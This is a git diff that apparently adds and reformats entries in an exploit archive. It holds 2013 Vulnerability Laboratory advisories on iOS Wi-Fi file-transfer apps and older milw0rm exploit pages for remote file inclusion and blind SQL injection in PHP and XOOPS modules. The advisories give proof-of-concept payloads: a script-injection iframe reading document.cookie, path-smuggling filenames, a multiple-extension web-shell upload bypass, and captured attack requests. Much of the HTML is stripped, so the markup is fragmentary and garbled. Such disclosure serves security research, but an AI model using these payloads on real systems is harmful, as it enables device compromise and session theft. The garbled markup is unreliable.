-The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module. -Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected -command/path request occurs in the album sub category list and the main album name index list. The security risk of the -command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-). - -Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access -and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific -commands or unauthorized path requests. - -Vulnerable Application(s): - [+] Wireless Transfer App v3.7 - -Vulnerable Parameter(s): - [+] album name - [+] photoGallery_head - album - -Affected Module(s): - [+] Index - Album Name List - [+] Sub Category - Title Album Name List - - -Proof of Concept (PoC): -======================= -The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low -user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below. - -Manual steps to exploit the vulnerability ... - -1. Install the wireless transfer v3.7 iOS mobile application -2. Open the default Photo app of your iOS device -3. Include an album with the following payload `">%20` and save it -4. Switch back to the installed wireless transfer app and start the wifi transfer -5. Open the local web-server url http://localhost:6688/ (default link) -6. The local path/command execute occurs in the album name value of the photoGallery_head class -7. Successful reproduce of the vulnerability! - - -PoC: Album Name - photoGallery_head in the Album Sub Category List - -
- -
logo
-
-
-
Album : ">%20
-
- -
-
-
- - -PoC: Album Name - photoalbum in the Album Index List - -
-
-
-
>%20(125)
-
-
Fotoarchiv(0)
-
-
WallpapersHD(3)
- - -Reference(s): -http://localhost:6688/index.html -http://localhost:6688/albumhtm -http://localhost:6688/albumhtm?id= -http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C - - -Solution - Fix & Patch: -======================= -The vulnerability can be patched by a secure encode and parse of the vulnerable album name value. -Parse and filter also the index and sub category output list to ensure it prevents local command/path requests. - - -Security Risk: -============== -The security risk of the local command/path inject web vulnerability is estimated as high. - - -Credits & Authors: -================== -Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] - - -Disclaimer & Information: -========================= -The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, -either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- -Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business -profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some -states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation -may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases -or trade with fraud/stolen material. - -Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com -Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com -Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com -Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab -Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php - -Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. -Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other -media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and -other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), -modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - - Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] - - - --- -VULNERABILITY LABORATORY RESEARCH TEAM -DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - diff --git a/platforms/hardware/webapps/30145.txt b/platforms/hardware/webapps/30145.txt new file mode 100755 index 000000000..941328ae9 --- /dev/null +++ b/platforms/hardware/webapps/30145.txt @@ -0,0 +1,218 @@ +Document Title: +=============== +Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1157 + + +Release Date: +============= +2013-12-05 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1157 + + +Common Vulnerability Scoring System: +==================================== +6.4 + + +Product & Service Introduction: +=============================== +WireShare supports more than 30 different file formats, including PDF, EPUB, TXT, CHM,PNG,MP3, RMVB and AVI. +You’re able to import files via EMAIL,Wi-Fi, iTunes File Sharing, the built-in browser, and Dropbox, Box, +SkyDrive, Google Drive and SugarSync.... Files can be arranged in folders, copied, renamed, zipped, and +viewed. You can view the document, read novels, listen to music, view photos, play video, annotate PDF +and share files in WireShare. + +(Copy of the Homepage: https://itunes.apple.com/de/app/wireshare-share-files-your/id527465632 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities +in the Feetan Inc WireShare (Share files with your friends) mobile application v1.9.1 for apple iOS. + + +Vulnerability Disclosure Timeline: +================================== +2013-12-01: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been discovered in the WireShare v1.9.1 for apple iOS. +A persistent input validation web vulnerability allows remote attackers to inject own malicious script codes on the +application-side (persistent) of the affected application web-server. + +The vulnerability is located in the add `New Folder` input field. The vulnerability allows remote attackers to inject +own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs +in the index path/folder listing with the vulnerable foldername parameter. The inject can be done local by the device +via add folder function or by remote inject via web-interface. The second execute occurs when the user is requesting +to delete the malicious injected script code entry of the folder list. The security risk of the persistent input +validation web vulnerability in the foldername value is estimated as high(-) with a cvss (common vulnerability scoring +system) count of 6.4(+)|(-)6.5. + +Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction +and no privileged web-interface user account. In the default settings is auth of the web-server deactivated and blank. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] New Folder (fileListContainer) + +Vulnerable Module(s): + [+] folder [name value] (targetItem) + +Affected Module(s): + [+] Folder Index List + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by local attackers with physical device access or +by remote attackers without privileged application user account and low user interaction. For security demonstration +or to reproduce the vulnerability follow the information and steps below. + + +PoC: Folder Index List - Index + +
+

+

Name

+

Size

+

Operation

+
+
+
+

+ + +

+

+New Folder <[PERSISTENT INJECTED SCRIPT CODE!].x"> +

+ + + +PoC: Folder Index List - Index + +
+
+
+ + + +--- PoC Session Request Logs [POST] --- +Status: 200[OK] +POST http://192.168.2.106:8080/# +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] +Content Size[-1] +Mime Type[application/x-unknown-content-type] + + +Request Headers: +Host[192.168.2.106:8080] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://192.168.2.106:8080/] +Connection[keep-alive] + +Post Data: +targetItem[%2520%26%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.vulnerability-lab.com+onload%3Dalert%28document.cookie%29+%3C] +operationType[create] +ID[0] +submitButton[] + +Response Headers: +Transfer-Encoding[chunked] +Accept-Ranges[bytes] +Date[Sun, 01 Dec 2013 22:17:30 GMT] + + +Solution - Fix & Patch: +======================= +The persistent input validation web vulnerability can be patched by a secure encode of the new folder name input field. +Encode and filter also the folder name output list were the malicious context execute has been occured. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability is estimated as high(-). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2013 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/hardware/webapps/30146.txt b/platforms/hardware/webapps/30146.txt new file mode 100755 index 000000000..6f39d0083 --- /dev/null +++ b/platforms/hardware/webapps/30146.txt @@ -0,0 +1,297 @@ +Document Title: +=============== +Print n Share v5.5 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1154 + + +Release Date: +============= +2013-12-06 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1154 + + +Common Vulnerability Scoring System: +==================================== +9.2 + + +Product & Service Introduction: +=============================== +Print directly to the widest range of network or WiFi printers, without a computer or AirPrint! Alternatively print +via your Mac/PC to ALL printers including USB & Bluetooth printers. Print... documents cloud files,web pages,emails, +attachments, photos, contacts, calendars, clipboard items, convert to PDF and much more - to ANY PRINTER! + +(Copy of the Homepage: https://itunes.apple.com/en/app/print-n-share-der-all-in-one/id301656026 + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Print n Share v5.5 mobile application for apple iOS. + + +Vulnerability Disclosure Timeline: +================================== +2013-12-01: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +EuroSmartz Ltd +Product: Print n Share 5.5 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Critical + + +Technical Details & Description: +================================ +1.1 +A local file/path include web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. +The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. + +The remote file include web vulnerability is located in the import file module in the filename value. Remote attackers can inject own files or +path requests by adding regular text files (add). It is also possible to use the `rename` or `import` function to inject. The file include and +path request execute occurs in the main file dir index or subcategory listing of the mobile application. The security risk of the local file +include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.4(+). + +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. +Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app. + +Request Method(s): + [+] [POST] + +Vulnerable Inputs(s): + [+] Neue Text Datei (New Text File) + [+] Umbenennen File (Rename File) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080) + + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. + +The vulnerability is located in the import file module. Remote attackers are able to upload a php or js web-shells by renaming the file with +multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension +`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file +extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is +estimated as high with a cvss (common vulnerability scoring system) count of 7.8(+). + +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] File Import + +Vulnerable Inputs(s): + [+] Importieren - File > Sync + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] File Path Listing (http://localhost:8080) + + + +1.3 +A persistent input validation web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. +The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application. + +The persistent input validation vulnerability is located in the Ordername (foldername) value of the print n share mobile web-application. +The exploitation can be done by usage of the local standard iOS pictures or video (default) app. Attackers rename the local device photo +or video foldername.The persistent execute occurs in the listed folder of the web-server interface (http://localhost:8080). Remote attackers +can also change the foldername by usage of the application to exploit (inject) via POST method own script code with persistent attack vector. +The vulnerable input are the `Ordername`(folder name), `Neuer Order` (new folder) and `Order Umbenennen` (folder rename). The security risk +of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+). + +Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium +user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account +steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context. + +Request Method(s): + [+] [POST] + +Vulnerable Input(s): + [+] Ordnername - (Foldername) + [+] Neuer Ordner - (New Folder) + [+] Ordner Umbenennen - (Rename Folder) + +Vulnerable Parameter(s): + [+] foldername - (path) + +Affected Module(s): + [+] File Dir List + + +Proof of Concept (PoC): +======================= +1.1 +The file include web vulnerability can be exploited by remote attackers without user interaction and also without privileged +web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below. + +PoC: +http://localhost:8080/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>".php + + +PoC Source: Local File Include Vulnerability - Filename + + +/ + + + +

?/


Clip-Archiv/ +
XX>"<<>".php +
[LOCAL FILE INCLUDE WEB VULNERABILITY!].txt + + + + +Reference(s): +http://localhost:8080/ + + + +1.2 +The arbitrary file upload vulnerability can be exploited by remote attackers without user interaction and also without privileged +web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below. + + +PoC: +http://localhost:8080/[file to path]">X>"<<>".jpg.gif..html.js.php.gif.jpg + + +PoC Source: Arbitrary File Upload Vulnerability - Filename + + +/ + + + +

?/


Clip-Archiv/ +
XX>"<<>".jpg.gif..html.js.php.gif.jpg +
[ARBITRARY FILE UPLOAD WEB VULNERABILITY!].jpg.gif..html.js.php.gif.jpg + + + + +Reference(s): +http://localhost:8080/ + + + +1.3 +The persistent input validation vulnerability can be exploited by remote attackers without privileged web-application user account +and with low user interaction. For security demonstration or to reproduce the vulnerability follow the steps and information below. + +PoC: +http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/"> + + +PoC Source: Persistent Input Validation Vulnerability - Ordnername (Foldername) + + +

?/


Clip-Archiv/ +
>" +<<>"<[PERSISTENT INJECTED SCRIPT CODE!]">/ +
Schnellstart.txt + + +Reference(s): +http://localhost:8080/ + + + +Solution - Fix & Patch: +======================= +1.1 +The file include web vulnerability can be patched by a secure encode and parse of the filename and the connected path value. + +1.2 +to fix the arbitrary file upload vulnerability it is required to restrict with a filter mechanism the filename extensions. +Disallow multiple extensions and setup and own exception-handling to prevent arbitrary file uploads and restricted file upload bypass. + +1.3 +To patch the persistent input validation web vulnerability parse and encode the `Ordername` (foldername) input values +in the import, add and rename function. +Filter and encode also the vulnerable output section of the malicious injected test values. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.4(+). + +1.2 +The security risk of the arbitrary file upload and upload restriction bypass vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.8(+). + +1.3 +The security risk of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/hardware/webapps/30215.txt b/platforms/hardware/webapps/30215.txt new file mode 100755 index 000000000..d49e9ab5a --- /dev/null +++ b/platforms/hardware/webapps/30215.txt @@ -0,0 +1,347 @@ +Document Title: +=============== +Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1166 + + +Release Date: +============= +2013-12-10 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1166 + + +Common Vulnerability Scoring System: +==================================== +8.8 + + +Product & Service Introduction: +=============================== +Download the photos & videos from your iPhones Library to computer / PC;Upload photos & videos from your computer; +Transfer photos in full resolution in *.png, *.jpg, *.zip formats;No limit of the number, size or quality of the +transferred photos;Photo Video Album Transfer is a multifunctional and easy-to-use app. It allows to transfer +photos and videos from iPhone to iPhone, from iPhone to computer and reverse. Now you can easily manage your +photo or video transfer and forget about cables, additional hardware and expensive programs. Transfer any number +of photos and videos using this irreplaceable application for iPhone. + +(Copy of the Homepage: https://itunes.apple.com/en/app/photo-video-album-transfer/id682294794 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Photo Video Album Transfer v1.0 mobile app for apple iOS. + + +Vulnerability Disclosure Timeline: +================================== +2013-12-09: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Apple AppStore +Product: Photo Video Album Transfer - Mobile Application (Igor Ciobanu) 1.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Critical + + +Technical Details & Description: +================================ +1.1 +A local file/path include web vulnerability has been discovered in the official Photo Video Album Transfer v1.0 mobile app for apple iOS. +The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. + +The remote file include web vulnerability is located in the vulnerable filename value of the iOS Transfer Utility (web interface) module. +Remote attackers can manipulate the filename value in the POST method request of the browse file upload form to cpmpromise the mobile app. +Remote attackers are able to include own local files by usage of the browse file upload module. The attack vecotor is persistent and the +request method is POST. The file include execute occcurs in the main file dir index list were the filenames are visible listed. The security +risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+). + +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. +Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Browse File Upload - File send & arrival (web interface) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080) + + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. + +The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by renaming the file with +multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension +`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file +extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is +estimated as high with a cvss (common vulnerability scoring system) count of 6.7(+). + +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Browse File Upload - File send & arrival (web interface) + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080) + + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability in the file name can be exploited by remote attackers without user interaction or privileged mobile +web-application user account. For security demonstration or to reproduce the vulnerability follow the provided steps and information below. + +Module: Upload +Input: Browse File +Method: POST + + +Manual stepst to reproduce the vulnerability ... + +1. Install and start the vulnerable mobile application +2. Open the web-server wifi transfer (localhost:8080) +Note: Start to tamper the browser (http) request and response session of the next POST Request +3. Click the browse file to upload button and choose a random file of your local hd +4. Change in the POST method request of the upload the filename value and inject your own webshell, remote- or local file +5. The execute after the inject occurs in the main index file dir listing of the iOS Transfer Utility +6. Successful reproduce of the remote vulnerability! + + +PoC: Index File Dir List - iOS Transfer Utulity (filename) + +
+ + + + + +
Refresh

<%20../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]"> 0.1 Kb08.12.2013 15:58

IMG_0556_th.png

2.9 Kb
+
+
+
+ + + +--- PoC Session Request Logs --- +Status: 200[OK] +POST http://192.168.2.106:8080/ +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] +Content Size[59002] Mime Type[application/x-unknown-content-type] + +Request Headers: +Host[192.168.2.106:8080] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://192.168.2.106:8080/] +Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5; +com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true] +Connection[keep-alive] + + +Post Data: +POST_DATA[-----------------------------1863134445217 +Content-Disposition: form-data; name="file[]"; filename="<../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]>" +Content-Type: image/png + +Status: 200 OK +GET http://192.168.2.106:8080/a Load Flags[LOAD_DOCUMENT_URI ] +Content Size[0] Mime Type[application/x-unknown-content-type] + +Request Headers: +Host[192.168.2.106:8080] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://192.168.2.106:8080/] +Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5; +com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true] +Connection[keep-alive] + +Response Headers: +Accept-Ranges[bytes] +Content-Length[0] +Date[So., 08 Dez. 2013 14:58:35 GMT] + + + +1.2 +The arbitrary file upload and restricted upload bypass vulnerability can be exploited by remote attackers without privileged web-application +user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below. + + +PoC: + + +

+ + + +
Refresh

+
+
-

- -ajann

- - - - - -# milw0rm.com [2007-02-08] + + + +Site-Assistant <= v0990(paths[version])Remote File Include Exploit + + + + + + +
+ +

Site-Assistant <= v0990(paths[version])Remote File Include Exploit

+ +

+
+ Target:[http://[target]/[scriptpath] +   +

+

+
+


+ +

+ +ajann

+
+ + + + +# milw0rm.com [2007-02-08] diff --git a/platforms/php/webapps/3633.htm b/platforms/php/webapps/3633.htm index bd43ce221..5494efa78 100755 --- a/platforms/php/webapps/3633.htm +++ b/platforms/php/webapps/3633.htm @@ -1,291 +1,291 @@ - - -XOOPS Module RM+Soft Gallery 1.0(categos.php) BLIND SQL Injection Exploit - - - - - - - -
- -

XOOPS Module RM+Soft Gallery 1.0 (categos.php) BLIND SQL Injection Exploit

- -

- Target:[http://[target]/ -               -

-
-  Path:[http://[target]/[scriptpath]    - -

-  Character:[Md5 - Character 1-32]   - -

-

- Cat Id:[categos.php?idcat=       ]   - -

-

-
-
-

- -ajann

-

-
- - - - - -# milw0rm.com [2007-04-01] + + +XOOPS Module RM+Soft Gallery 1.0(categos.php) BLIND SQL Injection Exploit + + + + + + + +
+ +

XOOPS Module RM+Soft Gallery 1.0 (categos.php) BLIND SQL Injection Exploit

+ +

+ Target:[http://[target]/ +               +

+
+  Path:[http://[target]/[scriptpath]    + +

+  Character:[Md5 + Character 1-32]   + +

+

+ Cat Id:[categos.php?idcat=       ]   + +

+

+
+
-

- -ajann

-

-
- - - - - -# milw0rm.com [2007-05-15] + + +XOOPS Module resmanager <= 1.21 (edit_day.php) BLIND SQL Injection Exploit + + + + + + + +
+ +

XOOPS Module resmanager <= 1.21 (edit_day.php) BLIND SQL Injection Exploit

+ +

+ Target:[http://[target]/ +               +

+
+  Path:[http://[target]/[scriptpath]    + +

+  Character:[Md5 + Character 1-32]   + +

+

+ Article Id:[print.php?articleid=]   + +

+

+
+